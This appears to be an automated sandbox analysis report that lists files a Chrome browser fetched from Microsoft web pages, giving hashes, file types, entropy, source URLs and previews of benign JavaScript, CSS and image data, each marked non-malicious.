                                                                                                                                                                                                                                                          SHA-512:1FAA14005B3390DEBBD54BED2156DA6C7ACF6B2A547D7B31A4ABD2FBC9333017AA1749F0FE4F72F1A7A6AAFF095DFF5F1472C09B2F75BBB047D86135668B8AC8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/videoplayer/ump.mjs
                                                                                                                                                                                                                                                          Preview:// Universal Media Player.// Build Date: 2024-12-18T00:52:50.018Z.// Commit: 3c417ad49a0341f52951cad65ea4e26f64002fda.// Build Number: 20241218.02../**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let U8=class extends Event{constructor(a,s,l){super("context-request",{bubbles:!0,composed:!0}),this.context=a,this.callback=s,this.subscribe=l??!1}};/**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. *//**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let O8=class{constructor(a,s,l,p){if(this.subscribe=!1,this.provided=!1,this.value=void 0,this.t=(d,m)=>{this.unsubscribe&&(this.unsubscribe!==m&&(this.provided=!1,this.unsubscribe()),this.subscribe||this.unsubscribe()),this.value=d,this.host.requestUpdate(),this.provided&&!this.subscribe||(this.provided=!0,this.callback&&this.callback(d,m)),this.unsubscribe=m},this.host=a,s.context!==void 0){const d=s;this.context=d.context,this.c
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (590)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1716
                                                                                                                                                                                                                                                          Entropy (8bit):5.2304068952006615
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:4435HDQ258U3JqVnCG/6YyTrkzRLj9tSRAE9P:hU25ZqVC6ByTrWRLjSRAE9P
                                                                                                                                                                                                                                                          MD5:4CFFC2C9B55F8BDE649E0D2535A1EEBD
                                                                                                                                                                                                                                                          SHA1:2AAF4DF1E02ED4F5BB48F00A7423F748BF544E0C
                                                                                                                                                                                                                                                          SHA-256:7BB50A050792F761855CC330E0248D037B37DD68FD23FBB7DB8A7E8694F50A94
                                                                                                                                                                                                                                                          SHA-512:599C87219B7E264CFF8E6951192C691E26DFFA88EFC607EDFE9205F1BB08DA28FD61B508FAE93652BE36BE1ADA57E50661490925B247A43C3EB7F24D8CA0C8D0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-analytics/v1.min.ACSHASH4cffc2c9b55f8bde649e0d2535a1eebd.js
                                                                                                                                                                                                                                                          Preview:'use strict';var experimentationAnalytics=function(){function g(a){return a&&0<a.length?!1:!0}function m(a){return Object.keys(a).map(function(b){return b+""+a[b]}).join("")}function n(a){var b=a.reduce(function(c,e){c[m(e)]=e;return c},{});return Object.keys(b).map(function(c){return b[c]})}function h(a){console.log("sendToVortex Call");a&&a.analytics&&f(a)}function k(a){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:a&&a.analytics?a.analytics.tnta:""}}}function l(a,.b){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:"",at_activity_name:a&&a.responseTokens[b]?a.responseTokens[b]["activity.name"]:"",at_exp_name:a&&a.responseTokens[b]?a.responseTokens[b]["experience.name"]:"",at_activity_id:a&&a.responseTokens[b]?a.responseTokens[b]["activity.id"]:"",at_exp_id:a&&a.responseTokens[b]?a.responseTokens[b]["experience.id"]:""}}}function f(a,b,c){b="number"===typeof b?b:25;c="number"===typeof c?c:200;var e=0;if(window.expAnalytics&
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                          Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1600x582, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):86364
                                                                                                                                                                                                                                                          Entropy (8bit):7.996703271043696
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:1536:2hP4B3pSnwqAplhPwVEo6j39WCftoOsAtjG6+TWtxztBSomothhoAlUyaQIv4d:ei3pSndYYVHdIXsSj7+6tPAWt/URQ04d
                                                                                                                                                                                                                                                          MD5:02814CE6DBF418D2E366F9B45F7FF838
                                                                                                                                                                                                                                                          SHA1:99EDF52DB5A2BA39DE19CF7629AEB12A978717D4
                                                                                                                                                                                                                                                          SHA-256:1A438340CCABF519B37D6BA58D27E8747F487F6B834E77C08E974ECDD61DC8C4
                                                                                                                                                                                                                                                          SHA-512:7FBF7592C4469721358BADA342DC1D26B274C80E3BC6F6965886F9ADE37BD7BA3AEAA3DD0CB2BC618246C5F000F2EA72E4D462FA59D9F9F7B8EB4F93F965523A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:RIFFTQ..WEBPVP8 HQ.......*@.F.>...A..ZA#..a,.....O.#2?..P.C..<......N.g............}.|..?..x..|.....h.=<......t?.............._...{..?......._.............G....._...?...|............'._.O................_...Oq?...?........../....L.......g........_.?4...................?.......4.(.G.................$._...?.z......?......_.?....<?.....?./._............w.....;e.......{.|9.....?s..|..'...............?..........'.....{..f.;...O./.................?.....9....._.o...........#.......O.!L.d.^6.....w.iT.....N.*..P..t..u.S.j....;...cm@P..'q.Lm...:..:....@.@..ZU1.......}.......".&=.E....|'.C...A..J..G....k.>.(.....J.6.....w.iT.....N.*..P..t..u.S.;...@....j.O.8.U.....^..8.......bj..c(..c-.W..!.#..y......P..t..u.9.$.!....@.@..ZU1..(.....J.6.....e..9..S.".Je..Q....!.........#".A...E....c.V...p^sv....r...(&..f..ips.5..0.).u.l.......J.G.3..qVd.qp..'q.Lm...:..:....@.@..ZGI7_Ug...,.5s...+..57f.....?.3..1...".n_->P.g&.0/.....A498k...P.I@C.&}.........].70.Y.,u.S.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (655)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):476900
                                                                                                                                                                                                                                                          Entropy (8bit):5.5048390520226524
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:4+iJyDmVwNQbmAbm8aw+dBABTSO6VCAuouax2fpfJM2ib:4MgY58a+Sz6ax28b
                                                                                                                                                                                                                                                          MD5:763C942B927FE0F5D20F673EAEA8CA64
                                                                                                                                                                                                                                                          SHA1:1702988FC64DC26072BDCA99D237F9C8AEF5DC75
                                                                                                                                                                                                                                                          SHA-256:0625AEA907B132E21DDA7CFE12C3AFFE07EAA45E9900CB5BDB602469F89C2E0D
                                                                                                                                                                                                                                                          SHA-512:67A44963E43EADFA3BD6ECAAF8342F91ED0F803C28AFF204EE835F32F100D741755DC3793628CF0D087AD3241A6D6C4834E02B9AD92B6E7392CF8E2F73AA474D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine/main-light.min.ACSHASH763c942b927fe0f5d20f673eaea8ca64.js
                                                                                                                                                                                                                                                          Preview:/*. OneCloud Reimagine v0.309.0. MWF (Moray) v2.8.1. Copyright (c) Microsoft Corporation. All rights reserved.. Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc..*/.'use strict';(function(V,L){"object"===typeof exports&&"undefined"!==typeof module?L(exports):"function"===typeof define&&define.amd?define(["exports"],L):(V="undefined"!==typeof globalThis?globalThis:V||self,L(V.ocrReimagine={}))})(this,function(V){function L(){function b(x,w,y){return Object.defineProperty(x,w,{value:y,enumerable:!0,configurable:!0,writable:!0}),x[w]}function d(x,w,y,R){w=Object.create((w&&w.prototype instanceof c?w:c).prototype);R=new r(R||[]);return A(w,"_invoke",{value:k(x,y,.R)}),w}function a(x,w,y){try{return{type:"normal",arg:x.call(w,y)}}catch(R){return{type:"throw",arg:R}}}function c(){}function e(){}function f(){}function g(x){["next","throw","return"].forEach(function(w){b(x,w,function(y){return this._invoke(w,y)})})}function h(x,w){function y(E,wa,ja,Lb){E=a(x[E],x,wa);if("throw"!==E.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (505)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1418
                                                                                                                                                                                                                                                          Entropy (8bit):5.418786110345074
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:gkWndJbDZVHGCGH0199EYCDNQNFHOS91AqCCoW40HJtmz2Xw+mlu4oFU5kveTOwD:gkw9ZVHG3HEuvNQNFv16XW1HJEkmEhUh
                                                                                                                                                                                                                                                          MD5:20AAFDF6904D3DC5DB0E0E33ABBFC1A4
                                                                                                                                                                                                                                                          SHA1:CC1A639FF69FE0D8A8F1EFEE7FCB04941E7B57C8
                                                                                                                                                                                                                                                          SHA-256:EE4E620F350907CE3867454B2BD45984BE949EB46B113183D4B8B403032DA14D
                                                                                                                                                                                                                                                          SHA-512:91B0BD81FCD2D3D040D9FC1DB74F5CA916EF88E7887D2868530BF1319EAF5462CC54421AB80FC97B258B569B9AF40F2B9FD1B6D417C9A4561BBA22EDF785D905
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/*. jQuery Cookie Plugin v1.4.1. https://github.com/carhartl/jquery-cookie.. Copyright 2013 Klaus Hartl. Released under the MIT license.*/.'use strict';(function(d){"function"===typeof define&&define.amd?define(["jquery"],d):"object"===typeof exports?d(require("jquery")):d(jQuery)})(function(d){function l(a,c){if(e.raw)var b=a;else a:{0===a.indexOf('"')&&(a=a.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{a=decodeURIComponent(a.replace(m," "));b=e.json?JSON.parse(a):a;break a}catch(h){}b=void 0}return d.isFunction(c)?c(b):b}var m=/\+/g,e=d.cookie=function(a,c,b){if(void 0!==c&&!d.isFunction(c)){b=d.extend({},e.defaults,b);.if("number"===typeof b.expires){var h=b.expires,g=b.expires=new Date;g.setTime(+g+864E5*h)}a=e.raw?a:encodeURIComponent(a);c=e.json?JSON.stringify(c):String(c);c=e.raw?c:encodeURIComponent(c);return document.cookie=[a,"\x3d",c,b.expires?"; expires\x3d"+b.expires.toUTCString():"",b.path?"; path\x3d"+b.path:"",b.domain?"; domain\x3d"+b.domain:"",b.secure?";
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1501
                                                                                                                                                                                                                                                          Entropy (8bit):7.518946990214807
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:+cKYj6Laz+UEYky83kN7Yl6zJ/8NXs9pfi61+EXHmz5q6brIr/NR:+cKYjwaW13o7YgpTrK61+RAWIZR
                                                                                                                                                                                                                                                          MD5:F96519F4A34C594F5ABF3CD4415A6AB2
                                                                                                                                                                                                                                                          SHA1:E0909EB808CCA1B009CC4002A32DF5A7BE618B79
                                                                                                                                                                                                                                                          SHA-256:9BE8E19E5A219F361AE85D42464EA3D19B68BB01A0C266A46882B9B6682EB5F3
                                                                                                                                                                                                                                                          SHA-512:DEBF66570BA714B31A234D058440833F0C9BE91D7896D3DB9D91DFC5C1875A0ADADB03DAC912D34DCBB260F7EE5867978558D1E2FD5710ED8DDF19236CDB2EDD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_YT?scl=1
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat.......?.@CA.2........b..9.I.Xn.....&..)bh.8..{(..5...t6.*.SD.J..$....K0[o....cK..|^C.K.-&..X.b4.5....G.8.D.."e...U.._..Z.j.v.../..}h.9.S.V.=....?.?.!.}.s2l.+.b.4J..?.........~E..O...%.G...F.s. ..`.....hY....Xr./.`..u,K.....m"..L..6N...x...$.BE.zGR..F.i7.a..]qKt....`....l.`..f?_P.%$.G...[oMs....I..Q<.A...a-......i...E.2.lh...:;.h.=...*S....6%...qgx..,..'.#5{"..z.V]^(....'...:./K*$.4.*.-..w.$j.q...Z.X..&.<..c.z.F?.*8...y.../.N.Z.km4..B....n.\.._..e.a+A. ..[uT..]W.*io...di-."o....(..../....o........94#.$.%..R.OW.e9...S.....W....P.4..D.......~i.6....^.......BK..m.\......~UL....X.wK....L%....).8a.....&.H!*S.p4...c..l..)..[.r.[..H....w.m*.rX..a..(X.i.....F...<....8Q.d.,0.....].8.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):4565
                                                                                                                                                                                                                                                          Entropy (8bit):7.879534543139402
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                                                                                                                                                                                          MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                                                                                                                                                                          SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                                                                                                                                                                          SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                                                                                                                                                                          SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/UHFbanner-MSlogo?fmt=png-alpha&bfc=off&qlt=100,1"
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65302)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):304858
                                                                                                                                                                                                                                                          Entropy (8bit):5.098842090973851
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:6kc1b3b99G9gR7N1xf6iKyqsNHHlYXklLHdkmBHV6ysv9S/NYWme0QWufThQWB3Q:x8vfThQ
                                                                                                                                                                                                                                                          MD5:561C834597FB9BC5AAC4021E21E006BE
                                                                                                                                                                                                                                                          SHA1:C535802C0C6171B4BE1A776034C330418B36983D
                                                                                                                                                                                                                                                          SHA-256:D8BAB22B1506E8444C64D92431F521964F658C380F5D32738AFEA85C15F03013
                                                                                                                                                                                                                                                          SHA-512:748BFA3F917C8E75699A52FFE0AB2F753262D1B73810ACF68523930B665EF10A85329BD63A2A7B39746154554EA7A195270D1326C98C77DE72F75E4EB14CBB2F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH561c834597fb9bc5aac4021e21e006be.css
                                                                                                                                                                                                                                                          Preview:@charset "UTF-8";/*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */@font-face{font-family:MWF-FLUENT-ICONS;src:url(resources/fonts/MWFFluentIcons.woff2) format("woff2"),url(resources/fonts/MWFFluentIcons.woff) format("woff"),url(resources/fonts/MWFFluentIcons.ttf) format("truetype")}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf) format("ttf");font-weight:400}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-euro
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (541)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3642
                                                                                                                                                                                                                                                          Entropy (8bit):5.399452635270733
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:yjXZ9sAK618PFA5Hvsy15vm9sgsTO7wdNTB:yjXPT2Sb15vkl7wdN9
                                                                                                                                                                                                                                                          MD5:BE3F2A9F6A41FC40556EFE260FC861A5
                                                                                                                                                                                                                                                          SHA1:EF6D673802EDF44C01EEA9DD86DF4E5ACD21757E
                                                                                                                                                                                                                                                          SHA-256:C94F3B6AA377CFC8D9416F38AEDF1E49C43DE0BDC6726858720610827DF2DD3E
                                                                                                                                                                                                                                                          SHA-512:05ED779F490E9F21153E0C6838198A9E5337C4361644E62A5C99BCA3978001840CAC2E947874983FABF15573FDDA548567176F77B0393A827E27E47ECB01792A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';window.ExpConsentUtils=window.ExpConsentUtils||{};window.ExpConsentUtils=function(){return{waitForObj:function(f){return new Promise(function(d,c){var h=0,k=setInterval(function(){100>h?"visitor"==f&&"object"===typeof visitor&&visitor||"consent"==f&&"undefined"!==typeof WcpConsent&&WcpConsent&&"undefined"!==typeof WcpConsent.siteConsent&&WcpConsent.siteConsent&&"undefined"!==typeof GPC_DataSharingOptIn&&null!=GPC_DataSharingOptIn?(clearInterval(k),d()):h++:(clearInterval(k),c())},50)})}}}();.var ExpConsentHandler=function(){function f(){window.ExpConsentUtils.waitForObj("visitor").then(function(){visitor.getVisitorValues(function(a){adobe.target.trackEvent({mbox:"personalizationConsent"})})}).catch(function(a){console.log(a)})}function d(){return WcpConsent&&WcpConsent.siteConsent&&void 0!==WcpConsent.siteConsent.isConsentRequired&&null!==WcpConsent.siteConsent.isConsentRequired?WcpConsent.siteConsent.isConsentRequired:!0}function c(){var a=WcpConsent&&WcpConsent.siteConse
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):159
                                                                                                                                                                                                                                                          Entropy (8bit):4.661188988961239
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:agWqLss4aXD5R20gJYRnd7HtOx1L5HQhLIzseX5LxfYLk21:QqPXD5bDRd7H8L5whLzeJSI21
                                                                                                                                                                                                                                                          MD5:C22EA5B46F3FCAD90DA0ABCC0A3F73D4
                                                                                                                                                                                                                                                          SHA1:2DB789C63AFB63D98932D7B55907DC3508E318B4
                                                                                                                                                                                                                                                          SHA-256:8334DAA260516BB896407461E5F10E8E3041B06C56846BBB9D3435C6E77513AD
                                                                                                                                                                                                                                                          SHA-512:A0359F8C25DC40CEFFD14A41BA81794717B99DABE78CBF8A8678F3E3EC57F317388CA0DC55B1CC6AD2D6C13D2B3CAEB5A64527BB2C646ED2D93775437DA646F1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';function isFeatureEnabled(b){var a=document.getElementById("customFeatureControl").getAttribute("enabledFeatures");return null!=a&&a.includes(b)};
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65471)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):4004963
                                                                                                                                                                                                                                                          Entropy (8bit):5.608526137357891
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:49152:AqDJZ0Df8/CxDmmu/nwEMPLkdvrCr82Ijcysknuhz1BjR1NYS01tQjmyi:mTPWHljyo
                                                                                                                                                                                                                                                          MD5:B43015D52D9B94E96ED0014BEEC60073
                                                                                                                                                                                                                                                          SHA1:4FF02D873DE449E83D0BD2E8CA0AEE0CCCEC2A5C
                                                                                                                                                                                                                                                          SHA-256:74F25E06CA7E129830D80CE20633807EE402C2163B758A9642A1845C59CADB14
                                                                                                                                                                                                                                                          SHA-512:CEEDE0683CCAEC41D0C203EAE939331F82C0265ACBCFB218476183423EA207BA3C06A1E49FE7D91D6CB1F860801D899255A3BAC3DF340A5B1F3A35B09B97D322
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://cdn.botframework.com/botframework-webchat/latest/webchat.js
                                                                                                                                                                                                                                                          Preview:/*! For license information please see webchat.js.LICENSE.txt */.!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var r=t();for(var n in r)("object"==typeof exports?exports:e)[n]=r[n]}}(self,(function(){return function(){var e,t,r={37825:function(e,t,r){"use strict";var n=r(92412),i={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},o={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},a={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},s={};function c(e){return n.isMemo(e)?a:s[e.$$typeof]||i}s[n.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},s[n.Memo]=a;var u=Object.defineProperty,l=Object.getOwnPropertyNames,p=Object.getOwnPropertySymbols,d=Object.getOwnPropertyDes
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):56975
                                                                                                                                                                                                                                                          Entropy (8bit):4.7745064069477285
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:md21iWKHFZV8rQ9KiY2pYJp10npm7Kc1DP:md21QHHAP
                                                                                                                                                                                                                                                          MD5:884BD098ECB71645787C430F99C6D7B6
                                                                                                                                                                                                                                                          SHA1:1F8B450E1D71D2F2242D6959A8C0EC50974EE448
                                                                                                                                                                                                                                                          SHA-256:B4530D1B6EE9EAF575D6758D140613A368341C087BF22EF3E9475C477E798733
                                                                                                                                                                                                                                                          SHA-512:CF8DDA718482CF562877EEEB67D1EEB02C06D0B70F2FEA31177B6E9CA6EE1A628693B7249CA361E72955B4811405EDB9B3B651DC323018BFF2C1CCA1F3305C54
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:(function () {. /** Check if OneCloud Reimagine namespace exists */. if (!window.ocReimagine) {. window.ocReimagine = {};. }.. /** Create product price module namespace */. if (!window.ocReimagine.ProductPriceModule) {. window.ocReimagine.ProductPriceModule = {};. }.. /** Initializes the reimagine product pricing manager and services */. function initializeProductPriceModule() {. try {. // Check if product pricing manager instance exists. if (window.ocReimagine && window.ocReimagine.ProductPriceModule && window.ocReimagine.ProductPriceModule.PricingManagerInstance) {. // If it exists, that means it has already been initialized so no need to re-initialize. return;. }.. window.ocReimagine.ProductPriceModule.PricingManagerInstance = new window.ocReimagine.ProductPriceModule.ProductPricingManager();. }. catch (error) {. }. }.. /**. * By defau
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 129x128, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):736
                                                                                                                                                                                                                                                          Entropy (8bit):7.67155770789133
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:o5vX5Vq/u2ajGL/kvQ4vqPz5Cb25PDQ7DHVW73F5tag2dGT1WZaIhNix1AuWGllG:cipajGLyQ4vqPVCGbQ7D07V5tMVZaqi6
                                                                                                                                                                                                                                                          MD5:3F5283225D3AE6A00ECE6EBAF310D67C
                                                                                                                                                                                                                                                          SHA1:8B657A5B0DF689215D25159231232B16E02C9173
                                                                                                                                                                                                                                                          SHA-256:CD3CBBBC1008CB16D06C872910364A7F10B147164EEF3E22CB23D98CC20EECE3
